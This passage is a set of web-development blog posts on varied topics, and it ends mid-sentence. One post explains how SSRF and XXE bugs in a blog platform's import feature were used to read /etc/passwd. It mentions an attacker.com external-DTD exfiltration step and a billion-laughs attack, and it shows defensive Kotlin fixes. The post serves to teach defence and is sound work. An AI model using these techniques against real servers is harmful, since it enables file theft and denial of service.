Posts in Web-development (20 found)
pabloecortez 2 days ago

Black Friday for You and Me

Yesterday it was Thanksgiving and I had the privilege of spending the holiday with my family. We have a tradition of doing a toast going around the table and sharing at least one thing for which we are grateful. I want to share with you a story that started last year, in January of 2024, when a family friend named Germán reached out to me for help with a website for his business. Germán is in his 50s, he went to school for mechanical engineering in Mexico and about twenty years ago he moved to the United States. Today he owns a restaurant in Las Vegas with his wife and also runs a logistics company for distributing produce. We met the last week of January, he told me that he was looking to build a website for his restaurant and eventually build up his infrastructure so most of his business could be automated. His current workflow required his two sons to run the business along with him. They managed everything manually on expensive proprietary software. There were lots of things that could be optimized, so I agreed to jump on board and we have been collaborating ever since. What I assumed would be a developer type of position instead became more of a peer-mentorship relationship. Germán is curious, intelligent, and hard working. It didn't take long for me to notice that he didn't just want to have software or services running "in the background" while he occupied himself with other tasks. He wanted to have a thorough understanding of all the software he adopted. "I want to learn but I simply don't have the patience," he told me during one of our first meetings. At first I admit I thought this was a bit of a red flag (sorry Germán haha) but it all began to make sense when he showed me his books. He had paid thousands of dollars for a Wordpress website that only listed his services and contact information. The company he had hired offered an expensive SEO package for a monthly fee. My time in open source and the indieweb had blinded me to how abusive the "web development" industry had become. I'm referring to those local agencies that take advantage of unsuspecting clients and charge them for every little thing. I began making Germán's website and we went back and forth on assets, copy, menus, we began putting together a project and everything went smoothly. He was happy that he got to see how I built things. During this time I would journal through my work on his project and e-mail my notes to him. He loved it. Next came a new proposition. While the static site was nice to have an online presence, what he was after was getting into e-commerce. His wife, Sarah, makes artisanal beauty products and custom clothes. Her friends would message her on Facebook to ask what new stuff she was working on and she would send pictures to them from her phone. She would have benefitted from having a website, but after the bad experience they had had with the agency, they weren't too enthused about the prospect of hiring them for another project. I met with both of them again for this new project and we talked for hours, more like coworkers this time around. We eventually came to the conclusion that it would be more rewarding for them to really learn how to put their own shop together. I acted more as a coach or mentor than a developer. We'd sit together and activate accounts, fill out pages, choose themes. I was providing a safe space for them to be curious about technology, make mistakes, learn from them, and immediately get feedback on technical details so they could stay on a safe path. I'm so grateful for that opportunity afforded to me by Germán and his family. I've thought about how that approach would look if applied to the indieweb. It's always so exciting for me to see what the friends I've made here are working on. I know the open web becomes stronger when more independent projects are released, as we have more options to free ourselves from the corporate web that has stifled so much of the creativity and passion that I love and miss from the internet. I want to keep doing this. If you are building something on your own, have been out of the programming world for a while but want to start again, or maybe you are almost done and need a little boost in confidence (or accountability!) to reach the finish line and ship, I'm here to help. Check out my coaching page to find out more. I'm excited about the prospect of a community of builders who care about self-reliance and releasing software that puts people first. Perhaps this Black Friday you could choose to invest in yourself :-)

0 views
Kix Panganiban 2 days ago

Utteranc.es is really neat

It's hard to find privacy-respecting (read: not Disqus) commenting systems out there. A couple of good ones recommended by Bear are Cusdis and Komments -- but I'm not a huge fan of either of them: Then I realized that there's a great alternative that I've used in the past: utteranc.es . Its execution is elegant: you embed a tiny JS file on your blog posts, and it will map every page to Github Issues in a Github repo. In my case, I created this repo specifically for that purpose. Neat! I'm including utteranc.es in all my blog posts moving forward. You can check out how it looks below: Cusdis styling is very limited. You can only set it to dark or light mode, with no control over the specific HTML elements and styling. It's fine but I prefer something that looks a little neater. Komments requires manually creating a new page for every new post that you make. The idea is that wherever you want comments, you create a page in Komments and embed that page into your webpage. So you can have 1 Komments page per blog post, or even 1 Komments page for your entire blog.

0 views

Imgur Geo-Blocked the UK, So I Geo-Unblocked My Entire Network

Imgur decided to block UK users. Honestly? I don’t really care that much. I haven’t actively browsed the site in years. But it used to be everywhere. Back when Reddit embedded everything on Imgur, maybe fifteen years ago, it was genuinely useful. Then Reddit built their own image hosting, Discord did the same, and Imgur slowly faded into the background. Except it never fully disappeared. And since the block, I keep stumbling across Imgur links that just show “unavailable.” It’s mildly infuriating.

0 views
Hugo 2 days ago

Securing File Imports: Fixing SSRF and XXE Vulnerabilities

You know who loves new features in applications? Hackers. Every new feature is an additional opportunity, a potential new vulnerability. Last weekend I added the ability to migrate data to writizzy from WordPress (XML file), Ghost (JSON file), and Medium (ZIP archive). And on Monday I received this message: > Huge vuln on writizzy > > Hello, You have a major vulnerability on writizzy that you need to fix asap. Via the Medium import, I was able to download your /etc/passwd Basically, you absolutely need to validate the images from the Medium HTML! > > Your /etc/passwd as proof: > > Micka Since it's possible you might discover this kind of vulnerability, let me show you how to exploit SSRF and XXE vulnerabilities. ## The SSRF Vulnerability SSRF stands for "Server-Side Request Forgery" - an attack that allows access to vulnerable server resources. But how do you access these resources by triggering a data import with a ZIP archive? The import feature relies on an important principle: I try to download the images that are in the article to be migrated and import them to my own storage (Bunny in my case). For example, imagine I have this in a Medium page: ```html ``` I need to download the image, then re-upload it to Bunny. During the conversion to markdown, I'll then write this: ```markdown ![](https://cdn.bunny.net/blog/12132132/image.jpg) ``` So to do this, at some point I open a URL to the image: ```kotlin val imageBytes = try { val connection = URL(imageUrl).openConnection() connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 connection.getInputStream().use { it.readBytes() } } catch (e: Exception) { logger.warn("Failed to download image $imageUrl: ${e.message}") return imageUrl } ``` Then I upload the byte array to Bunny. Okay. But what happens if the user writes this: ```html ``` The previous code will try to read the file following the requested protocol - in this case, `file`. Then upload the file content to the CDN. Content that's now publicly accessible. And you can also access internal URLs to scan ports, get sensitive info, etc.: ```html ``` The vulnerability is quite serious. To fix it, there are several things to do. First, verify the protocol used: ```kotlin if (url.protocol !in listOf("http", "https")) { logger.warn("Unauthorized protocol: ${url.protocol} for URL: $imageUrl") return imageUrl } ``` Then, verify that we're not attacking private URLs: ```kotlin val host = url.host.lowercase() if (isPrivateOrLocalhost(host)) { logger.warn("Blocked private/localhost URL: $imageUrl") return imageUrl } ... private fun isPrivateOrLocalhost(host: String): Boolean { if (host in listOf("localhost", "127.0.0.1", "::1")) return true val address = try { java.net.InetAddress.getByName(host) } catch (_: Exception) { return true // When in doubt, block it } return address.isLoopbackAddress || address.isLinkLocalAddress || address.isSiteLocalAddress } ``` But here, I still have a risk. The user can write: ```html ``` And this could still be risky if the hacker requests a redirect from this URL to /etc/passwd. So we need to block redirect requests: ```kotlin val connection = url.openConnection() if (connection is java.net.HttpURLConnection) { connection.instanceFollowRedirects = false } connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36") connection.setRequestProperty("Referer", "https://medium.com/") connection.setRequestProperty("Accept", "image/avif,image/webp,*/*") connection.connectTimeout = 10000 connection.readTimeout = 10000 val responseCode = (connection as? java.net.HttpURLConnection)?.responseCode if (responseCode in listOf(301, 302, 303, 307, 308)) { logger.warn("Refused redirect for URL: $imageUrl (HTTP $responseCode)") return imageUrl } ``` Be very careful with user-controlled connection opening. Except it wasn't over. Second message from Micka: > You also have an XXE on the WordPress import! Sorry for the spam, I couldn't test to warn you at the same time as the other vuln, you need to fix this asap too :) ## The XXE Vulnerability XXE (XML External Entity) is a vulnerability that allows injecting external XML entities to: - Read local files (/etc/passwd, config files, SSH keys...) - Perform SSRF (requests to internal services) - Perform DoS (billion laughs attack) Micka modified the WordPress XML file to add an entity declaration: ```xml ]> ... &xxe; ``` This directive asks the XML parser to go read the content of a local file to use it later. It would also have been possible to send this file to a URL directly: ```xml %dtd; ]> ``` And on [http://attacker.com/evil.dtd](http://attacker.com/evil.dtd): ```xml "> %all; ``` Finally, to crash a server, the attacker could also have done this: ```xml ]> &lol9; 1 publish post ``` This requests the display of over 3 billion characters, crashing the server. There are variants, but you get the idea. We definitely don't want any of this. This time, we need to secure the XML parser by telling it not to look at external entities: ```kotlin val factory = DocumentBuilderFactory.newInstance() // Disable external entities (XXE protection) factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true) factory.setFeature("http://xml.org/sax/features/external-general-entities", false) factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false) factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false) factory.isXIncludeAware = false factory.isExpandEntityReferences = false ``` I hope you learned something. I certainly did, because even though I should have caught the SSRF vulnerability, honestly, I would never have seen the one with the XML parser. It's thanks to Micka that I discovered this type of attack. FYI, [Micka](https://mjeanroy.tech/) is a wonderful person I've worked with before at Malt and who works in security. You may have run into him at capture the flag events at Mixit. And he loves trying to find this kind of vulnerability.

0 views
Manuel Moreale 3 days ago

Dealgorithmed

TL;DR: I hate having spare time, and I decided to launch another newsletter called Dealgorithmed . Will start on January 1st, delivered every 1st and 15th of every month. It’s gonna be a discovery newsletter focused on the personal/independent/whimsical/indie web. I spent the last 15 years of my life working on the web, coding all sorts of sites for all sorts of people. Part of me loves the web, while another part of me hates what the web is becoming. One thing I refuse to do, though, is give up on it. This idea I see floating around that the web is dead and we should just give up the whole project and start from scratch makes absolutely no sense to me. Yes, a huge chunk of the web is unbearable to use at the moment. Yes, an enormous percentage of sites are impossible to navigate without ad blockers. And yes, AI is not making the situation any better and also yes, I am so goddamn tired of hearing AI talk nonstop everywhere all the time. All that is absolutely true. But that’s not all the web there is out there. The web is vast. It’s probably impossible to say with certainty how big it really is, but the Internet Archive recently celebrated 1 trillion pages archived . Yes, that’s trillion with a T. You know how long it would take to count to a trillion if you could count one number every single second without ever stopping? 31000 years. The fact that people keep browsing the same 3 sites, day after day, getting served content by algorithms controlled by 3 companies is such a shame. Because there is so much interesting content out there ready to be discovered. And discovering new content also means connecting with new people, getting exposed to new ideas, different cultures. That’s by far the best quality of the web if you ask me. The problem many people are facing is how to find that content, how to escape the algorithmic bubble. I think the only answer to that is curation. The vast majority of people on the web are lurkers which means someone has to spend time herding content and collecting it somewhere for others to consume. Over the years, I realised that it is probably the only reasonable contribution I can give to this cause. I’m already doing this with People and Blogs, slowly composing a list of people—and blogs—worth following and engaging with. And I’m also collecting content both on the blogroll and on the forest . If I already have these, why start something new you might be wondering. There’s a reason for this. Two actually. The first reason is that I hate having spare time, apparently. And if I have to burn myself to the ground in front of a screen, I might as well do it while doing something fun and useful. The second—and more serious—reason is that all those projects have some limitations. P&B moves slowly. It’s a weekly series, which means you’re discovering at most 5 new blogs a month. Yes, there are links on those interviews, but still, this is a slow-moving project. The forest and the blogroll, on the other hand, require intention. Those are sites you need to visit in order to discover new content, and we all know it’s a lot more convenient when content comes to you, rather than the other way around. Which is why I decided to start another newsletter. The goal with Dealgorithmed is to provide interesting content gathered from all around the web in a convenient package delivered in your inbox twice a month. Content that you can then use as a starting point for your own internet explorations. If all this sounds compelling to you, feel free to sign up . The first email should land in your inbox on January 1st. Thank you for keeping RSS alive. You're awesome. Email me :: Sign my guestbook :: Support for 1$/month :: See my generous supporters :: Subscribe to People and Blogs

0 views
fLaMEd fury 4 days ago

Personal Websites Aren’t Dead

What’s going on, Internet? This post “ Personal Websites Are Dead ” has been making the rounds this week and it’s as dumb as it sounds. Naturally, I disagree. Strongly. “Personal websites are dying because platforms got better.” “Your Substack profile is a website.” The post boils down to this: platforms are easier, reach is outsourced, maintenance is annoying, and feeds have replaced homepages. Sure. But that’s not proof personal websites are obsolete. It’s proof most people stopped valuing ownership. The web didn’t change. People did. The tradeoff is simple. You either own your space or you rent one. Renting is convenient until the landlord changes the locks, rewrites the rules, or decides you don’t fit the algorithm today. A personal website isn’t about traffic spikes or “momentum”. It’s about autonomy. It’s about opting out of surveillance feeds, tracking, friction, and platform churn. It’s about having a corner of the internet that isn’t trying to convert, optimise, or harvest anything. If anything, the personal web movement shows the opposite of what this post shared on Medium (lol) claims. More people are tired of platform dependency. More people are building small, simple sites again. Not for reach. For identity. For community. For longevity. For personal archives and homes on the web that don’t disappear when a company pivots. Maintenance can be a burden depending on your skill level, but it’s all part of the craft. If someone finds updating a theme (easy example - I know) too hard, fine. But it’s not evidence the personal web is dying. It’s evidence they were never that invested in the web to begin with. Which brings me back to a question I keep asking: why isn’t making websites easier by now ? Personal websites aren’t dead. They’re just not fashionable. And that’s fine. The open web has always thrived on the people who keep publishing, keep tinkering, and keep owning their corner without needing permission. The future of the web doesn’t belong to platforms. It belongs to whoever shows up and keeps building. Hey, thanks for reading this post in your feed reader! Want to chat? Reply by email or add me on XMPP , or send a webmention . Check out the posts archive on the website.

0 views
Josh Comeau 5 days ago

Brand New Layouts with CSS Subgrid

Subgrid allows us to extend a grid template down through the DOM tree, so that deeply-nested elements can participate in the same grid layout. At first glance, I thought this would be a helpful convenience, but it turns out that it’s so much more. Subgrid unlocks exciting new layout possibilities, stuff we couldn’t do until now. ✨

0 views
Jim Nielsen 1 weeks ago

My Number One “Resource Not Found”

The data is in. The number one requested resource on my blog which doesn’t exist is: According to Netlify’s analytics, that resources was requested 15,553 times over the last thirty days. Same story for other personal projects I manage: “That many requests and it serves a 404? Damn Jim, you better fix that quick!” Nah, I’m good. Why fix it? I have very little faith that the people who I want most to respect what’s in that file are not going to do so . So for now, I’m good serving a 404 for . Change my mind. Reply via: Email · Mastodon · Bluesky iOS Icon Gallery : 18,531 requests. macOS Icon Gallery 10,565 requests.

0 views
Dan Moore! 1 weeks ago

Thankful For Memory Managed Languages

I’m thankful my software career started when memory managed languages were first available and then dominant. Or at least dominant in the areas of software that I work in–web application development. I learned BASIC, WordPerfect macros, and Logo before I went off to college. But my first real programming experience was with Pascal in a class taught by Mr. Underwood (who passed away in 2021 ). I learned for loops, print debugging and how to compile programs. Pascal supports pointers but I don’t recall doing any pointer manipulations–it was a 101 class after all. I took one more CS class where we were taught C++ but I dropped it. But my real software education came in the WCTS ; I was a student computer lab proctor. Between that and some summer internships, I learned Perl, web development and how to deal with cranky customers (aka students) when the printer didn’t work. I also learned how to install Linux (Slackware, off of something like 16 3.5-inch disks) on a used computer with a 40MB hard drive, how to buy hardware off eBay, and not to run in a C program. That last one: not good. I was also able to learn enough Java through a summer internship that I did an honors thesis in my senior year of college. I used Java RMI to build a parallelizable computation system. It did a heck of a job of calculating cosines. My first job out of school was slinging perl, then Java, for web applications at a consultancy in Boulder. I learned a ton there, including how to grind (one week I billed 96 hours), why you shouldn’t use stored procedures for a web app, how to decompile a Java application with jad to work around a bug, and how to work on a team. One throughline for all that was getting the work done as fast as possible. That meant using languages and frameworks that optimized for developer productivity rather than pure performance. Which meant using memory managed languages. Which are, as Joel Spolsky wrote , similar to an automatic transmission in terms of letting you just go. I have only the faintest glimmer of the pain of writing software using a language that requires memory management. Sure, it pops up from time to time, usually when I am trying to figure out a compile error when building an Apache module or Ruby gem. I google for an incantation, blindly set environment variables or modify the makefile, and hope it compiles. But I don’t have to truly understand malloc or free. I’m so thankful that I learned to program when I didn’t have to focus on the complexities of memory management. It’s hard enough to manage the data model, understand language idiosyncrasies, make sure you account for edge cases, understand the domain and the requirements, and deliver a maintainable solution without having to worry about core dumps and buffer overflows.

0 views
Rik Huijzer 1 weeks ago

Making IPv6 work with Caddy and Hetzner

After a few hours of fiddling, this site is now properly accessible via IPv6. My configuration uses Caddy as the reverse proxy meaning that it forwards the requests to the right service based on the `Host` that the browser specifies. Thanks to this, one server can host hundreds if not thousands of websites from one IP. In my Caddyfile, I had specified the following ```caddyfile www.huijzer.xyz { redir https://huijzer.xyz permanent } huijzer.xyz { reverse_proxy 127.0.0.1:3000 } ``` And then I thought that for IPv6 maybe this last part should have been ```caddyfile huijzer.xyz { reverse_p...

0 views
Simon Willison 1 weeks ago

How I automate my Substack newsletter with content from my blog

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There's a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack. The core process is the same as I described back in 2023 . I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: That's the whole process! The most important cell in the Observable notebook is this one: This uses the JavaScript function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook. Here's a link to see and execute that query directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet: My blog's URLs look like - this SQL constructs that three letter month abbreviation from the month number using a substring operation. This is a terrible way to assemble HTML, but I've stuck with it because it amuses me. The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button. Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack. I can't remember how I figured this out but it's very effective: My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's the source code for that Django application . I use the Django admin as my CMS. Datasette provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use. My system for doing that lives in the simonw/simonwillisonblog-backup GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite. My db-to-sqlite tool is responsible for that conversion. I call it like this : That command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme). can then export that data and write it to a SQLite database file called . The options specify the tables that should be included in the export. The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a commit history of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself. At the end of my GitHub Actions workflow is this code that publishes the resulting database to Datasette running on Fly.io using the datasette publish fly plugin: As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low. You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . The core process is the same as I described back in 2023 . I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post. Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example. Blocks of preformatted text often have an extra blank line at the end, which I remove. Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more. I pick the featured image for the newsletter and add some tags.

0 views
W. Jason Gilmore 1 weeks ago

Toggling Between Fullscreen Editor and Terminal In VSCode and Cursor

November 18, 2025: This article was originally published on June 4, 2024 and later updated for clarity after I returned to it and couldn't figure out which file to modify! I've been a Vim user for decades however a few years ago I switched to VS Code and then subsequently Cursor for my web development work. When building modern web apps you'll spend almost as much time running shell commands as coding, so I need to have a terminal within easy reach at all times. In fact I typically keep several terminal tabs open, including one opened to the local MySQL instance, one running a worker, and one to execute various shell commands including those related to managing my Git repository. I want this transition between editor and terminal to be as seamless as possible and so I setup two keyboard shortcuts to help me quickly move back and forth between the two. Furthermore, the transition will always open the terminal in fullscreen mode so I'm not fighting with screen real estate on a laptop. To configure these shortcuts, open the keyboard shortcuts ( ) file in JSON mode and add the following entries: I've used for the toggling shortcut, however you can switch this to whatever you'd like. If you're running Windows I suppose you would change the shortcut to or something like that. Once defined, save the changes and then try using the keyboard shortcut to switch between the two. With the terminal maximized your VS Code enviroment will look like this: If you have any other VS Code screen optimization tips, I'd love to hear about them! Hit me up on Twitter at @wjgilmore .

0 views
Michael Hoffmann 1 weeks ago

Navigating State Management in Vue: Composables, Provide/Inject, and Pinia

Explore the best practices for using Composables, Provide/Inject, and Pinia in Vue applications. Learn when to use each approach to manage state effectively in your projects, understanding the nuances that make each method suitable for different scenarios.

0 views
iDiallo 2 weeks ago

The App Developer's Attachment Issues

When browsing the web, I still follow rabbit holes. For example, I will click on a link, read an article, find another link in the body, follow that one as well, and keep on going until I get lost in the weeds and appear in wonderland. When I'm reading through my phone, I often have to go back to the browser history to see the trail of websites that lead me to my destination. But sometimes, I just can't find my way back. Why? Because somehow, I wasn't reading through the web browser. I was browsing through webview. So when you are on instagram and click on a link shared by a friend. The page loads instantly, but something feels off. You are browsing the web, yet you don't see the familiar browser tabs or address bar. You are in a webview . Why webview and not your favorite browser? Well, this is what I call App attachment issues. App developers don't want you to leave. And webview is the invisible fence they use to keep you tethered. When an application loads content within an in-app browser (a webview) you are, technically, using the web. It's running the same rendering engine as a dedicated browser. But the app's sole purpose for doing this is to silo you. They want to maintain control over your experience, ensuring you are never truly free to roam the open internet. The benefit for the developer is that no matter what page you browse, you are perpetually one button click away from being back in their app. It's a mechanism for user retention, a digital leash. Every company, from social media giants to news aggregators, is trying to fit you into their specific bucket, convinced that if they let you leave, you might not come back. They want to maintain that control over your experience, even when you are outside their reach. On Android, this is super annoying. You might be able to click links and navigate from the initial website to a completely different, unrelated one, but you often cannot manually change the URL. You are trapped in the current browsing flow, unable to jump to a new destination without first leaving the app or performing a dedicated search. Why are you still under the app's thumb if you're surfing the public web? The answer is always control. The web is a dangerous place. What if you click on the wrong link and your device gets compromised? We can't protect you in this case. At least that's what it feels like when clicking on external links on some websites. For example, on LinkedIn when you click an external link, you are often greeted with a warning message like this: This link will take you to a page that's not on LinkedIn Because this is an external link, we're unable to verify it for safety. On the surface, it appears to be a helpful security measure. The platform is protecting you from the big, bad internet. But the only thing they are truly protecting you from is leaving their app. If the link was already shared by a contact or surfaced on their platform, the implicit due diligence should have been done. Serving up a blanket safety warning for any external link, even those to major news organizations or well-known websites, is just a friction point to discourage you from leaving. It's a psychological barrier designed to make you hesitate, keep you inside the known confines of their platform, and reinforce their control. This security warning is nothing more than the final, passive-aggressive plea in the app's campaign against your freedom. If the in-app silo was just the web, but within the app, I wouldn't complain. But while developers are focused on retention, the user experience suffers in some infuriating ways. The webview is a fundamentally broken browsing experience for three core reasons: The most frustrating drawback is the lack of permanence. Your browsing history is at the mercy of the developer. They can choose to record it, or not record it. And you will be none the wiser until you are trying to find that article you read just this morning. With my rabbit hole style of browsing the web, I often stumble upon great articles, helpful tools, or even products that I mean to return to. But if any of those pages were viewed under a webview, they vanish without a trace. Related to the missing history is the risk of accidental loss. You might be deep into an article, hit the back button to navigate one step back on the site, and instead, the entire webview collapses, dumping you unceremoniously back into the main app feed. Because no history was recorded, there is no way to return to the page you were just on. The article is simply gone. There is a common counterargument that says, "Most apps have a setting to disable webview and open links directly in your full browser." But two points to this. 1. Most people don't ever change the default settings. 2. Why is this even an option to select? If the webview uses the browser engine anyway, why should the default setting be the one that compromises the user's web experience? Users do not dive into granular settings menus. The path of least resistance is the path most taken. By defaulting to webview, developers are prioritizing their retention goals over basic utility. The entire architecture of the web is built on freedom, open access, and a unified browsing experience. By forcing a dedicated web environment, developers are fragmenting the internet and making our lives slightly harder. I'm sure there are some metrics out there that say “using in-app webview increases engagement by x%.” But for n=1, aka me, it only increases my disengagement. All I can say to developers is: It's okay to let go. The remedy for your attachment issues is user freedom. When I click a link, I expect to be in a full browser, with a permanent history, a functional address bar, and true control over my destination. It's time for applications to trust users, respect the open web, and stop trapping us in the confines of their digital cages. For users, next time you click a link, look for that small icon, often a compass, an arrow, or an ellipsis, then choose to open in browser. It's your internet. It's okay to leave the app. Or even better, never download the apps .

0 views
Manuel Moreale 2 weeks ago

Nic Chan

This week on the People and Blogs series we have an interview with Nic Chan, whose blog can be found at nicchan.me . Tired of RSS? Read this in your browser or sign up for the newsletter . The People and Blogs series is supported by Numeric Citizen and the other 124 members of my "One a Month" club. If you enjoy P&B, consider becoming one for as little as 1 dollar a month. Hi, my name is Nic Chan! I'm a web developer and hobbyist artist who lives in Hong Kong. It's pretty funny, depending on who you ask, the audience is shocked to hear about my secret other life, since I typically keep these identities very separate. If I'm not tinkering with websites or frantically mixing paint, you might find me shitposting on Mastodon, sweating through the Hong Kong summers or volunteering at the cat shelter. Despite growing up on the internet, I had never intended to be a web developer. I studied Fine Arts at a small liberal arts college in California, where I solidified a vaguely Californian accent that haunts me till this day. I entered the working world hoping to start a career that would somehow be arts related, but quickly decided that it wasn't for me. The art world, especially at higher levels, feels very inauthentic and performative in a way that left me constantly tired. During that time, I managed to convince my employer that it would save them money if I also managed their website for them, and used that opportunity as a spring board to teach myself web development. Upon reflection, I have no idea how I managed to convince them that this was a good idea. Though some engagements were longer than others, I've been a freelance web developer for around 10 years now! I'm a web generalist, but the thing I want to do more of is building sustainable and accessible websites with core web technologies. This really is the reason I continue to do what I do! I love the web as a medium, and I want to see it thrive. The reason why I started posting on my blog was basically to prove to clients that I was a real, trustworthy person. Unfortunately, to have any sort of success as a freelancer, unless you are a literal savant, I think you need to do -some- kind of marketing, and blogging is the only method that I found acceptable to me personally. (LinkedIn was still a cesspit in 2015!) In recent years, the blog has very much drifted away from that original purpose. I now mostly post very long-form thoughts on tech industry topics, whenever I feel the need to. For some odd reason, my instructional/informative writing is not as popular as my ranting, so I will leave tech education to other folks! As far as my blog goes now, I probably spend an equal amount of time tinkering on random code parts of the site as writing blog posts. I want to explore more topics outside of web development and the tech industry in the future. My absolute favorite bloggers are the ones who 'bring their whole selves' to their blog, and post updates on their creative hobbies or whatever is on their mind at the moment. The thing I love about the IndieWeb is mostly the people behind it, so getting to bond over the little things like shared hobbies is one of the main draws for me. Fuck the technology, I'm here for the people. My blogging process is pretty simple. I might have an idea for a topic, and I'll create a file in Obsidian with as much information as I care to note down, and when I get a moment I will come back and write out the post, usually in a very linear way, in as many sittings as it takes to finish the draft. I switched to Obsidian sometime in 2025 and it really did help me get a lot more writing done than I did in years past — cloud-based SaaS solutions are fine, but apparently, if I have to log in to a website to start writing, that does pose a significant barrier to me actually getting any writing done. Having Obsidian just be there on my desktop removes that tiny bit of friction, and I had really underestimated how important that is to the creative process. Once a draft is done, I like to let things sit and marinate for a while, until I can read it again with 'fresh eyes.' You'll never find a super timely take on current events on my blog, I take far too long for that! I don't typically write additional drafts — call it a character flaw, but I'm far more likely to scrap an idea completely than to rework it in a substantial way. Shamefully, I have posts from over a year ago that are still about 90% complete. They will sit until I finally manage to push through whatever reservations I might have about posting and just hit the publish button. If I'm writing something more technical or industry-related, I will try badger some folks to do a quick read-through. Special shoutout to my buddy EJ Mason for being the person who usually suffers through this task. I have a pretty particular desk setup for ergonomic/health reasons. I am physically incapable of being a laptop in a coffee shop kind of person, my fingers will start to turn numb as I use the trackpad, and I've used a custom keyboard layout for so long I can't really get work done on a traditional keyboard layout! If I'm writing at my computer, I need to be in my home office, at my PC, with my Ergodox EZ (a split ortholinear keyboard that has served me very well over the past few years), and a drawing tablet as a pointer device. I like it to be nice and quiet when I'm writing, if there's background noise, I can't hear my internal voice over the sound of other people speaking! Even with this particular setup, sitting at my desk does tire me out more than most people, so on very rare occasions I will draft a post with pen and paper. Unlike with computer writing, I'm completely agnostic as to what materials I actually write with, I've occasionally written post outlines on stray receipts or napkins. I built my personal site with Astro and Svelte! I have a whole series on the topic of building my website if you want a peek behind the hood at how I did it. There's so much I want to do to extend the site, but I find the biggest obstacle remains creating the graphics. The funny thing is, I definitely feel a sense of dread when looking at a blank canvas, even when I know what the final product is going to look like. Maybe putting this out there in the world will be the kick in the butt I need to make progress! Everything is managed in code and Markdown, without a CMS. Though it does have flaws and limitations when it comes to certain components, Markdown remains my favorite format for drafting pretty much anything. My site is currently hosted on Cloudflare. I fully admit that it's not very IndieWeb of me, I do feel strongly about potentially moving off big tech infrastructure, but I'm not very good at managing servers on my own and I'm a bit scared to do so with the prevalence of bad-faith crawlers. Yeah, I wouldn't write the components in Svelte. If you look back at my posts, I acknowledge that I would probably regret this decision and want to use web components later, but at the time I lacked the web components knowledge to execute the vision properly. No shade against Svelte, it's just that for something like my blog, I prefer to have to deal with less of a maintenance burden than I might willingly take on for a work project, since I'm only in the codebase for a couple of times a year. There are some features/syntax that I'm using that will likely be deprecated in future versions of Svelte, so that's a pain I will have to deal with eventually. In my youth, I definitely had a bit of 'shiny new thing syndrome' when it came to web technologies. Nowadays, I prefer things that are more stable and slow. I've been burned just a few too many times for me to feel excited about proprietary technology! I pay for $24 USD for a domain name. I swear it used to be cheaper in the past! I also pay Plausible and Tinylytics as I believe in paying for privacy-respecting services. I started with Plausible, and at some point I became preoccupied with having a heart button for my posts, so I added Tinylytics. It's on my long list of todos to sort this out, I definitely don't need both. I mainly keep analytics to know where my posts are being linked from — doing this has helped me find some really awesome people and blogs (badum-tsh). Other than that, keeping the site running is free. This might change in the future, I do want to do more fun things that might require more financial resources, but I don't have any intent to monetize it, it's just a little home on the internet that I'm happy throw cash at to keep the (metaphorical) lights on. In no particularly order, here's a list of blogs I've been really enjoying. I think there will be some level of overlap with the People and Blogs folks, as I've been a long-time reader and found many folks worth following through this series, so thank you Manu! After rambling on for far too long for most of this, I'm finally at a loss for words. I'd be much obliged if you visited my site but you can also follow me on Mastodon if you have a hankering for some shelter cat pics. I have a submission coming out for the 'Free To Play' gaming-themed zine under Difference Engine , a Singaporean indie comics publisher. It's a collaboration with the narrative designer & writer Sarah Mak , I hope you'll check it out when the time comes! Now that you're done reading the interview, go check the blog and subscribe to the RSS feed . If you're looking for more content, go read one of the previous 115 interviews . Make sure to also say thank you to Luke Dorny and the other 124 supporters for making this series possible. Like Keenan , who I found from this series and is rapidly becoming one of my all-time favorite bloggers. Keenan is a true wordsmith, and an incredibly kind human. They're so good at what they do, that they managed to completely break some assumptions I had about myself, like I thought I hated the podcast format of 'two friends chatting' until they started one with Halsted ! Ethan Marcotte has been absolutely killing it lately. His work is quiet and thoughtful, but in a wonderfully understated way that sticks in your brain for a long, long time. I've never seen anyone write as much as Jim Nielsen does and still have as many awesome posts. Come on, what's your secret Jim? Melanie Richards is one 